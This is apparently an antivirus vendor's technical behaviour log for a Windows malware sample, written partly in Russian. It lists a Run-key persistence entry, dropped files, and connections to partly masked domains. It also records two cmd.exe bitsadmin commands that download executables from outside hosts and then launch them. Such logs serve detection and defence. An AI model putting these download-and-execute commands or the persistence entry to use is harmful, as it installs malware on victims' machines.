Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'VolID' = '%APPDATA%\VolID.url'
- %APPDATA%\VolID.url
- %APPDATA%\iplog.url
- 'localhost':1037
- 'so##rm.com':80
- 'ma##r.info':443
- http://so##rm.com/
- DNS ASK so##rm.com
- DNS ASK ma##r.info
- ClassName: '' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- '<SYSTEM32>\cmd.exe' /k bitsadmin /transfer ringtone http://3r####lisher.com/start.exe %userprofile%\VolID.exe&timeout 40&start %userprofile%\VolID.exe&Exit 5
- '<SYSTEM32>\cmd.exe' /k bitsadmin /transfer ringtone http://re##.life/TI9J1Lvns1.exe %userprofile%\home.exe&timeout 40&start %userprofile%\home.exe&Exit 5
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' -Embedding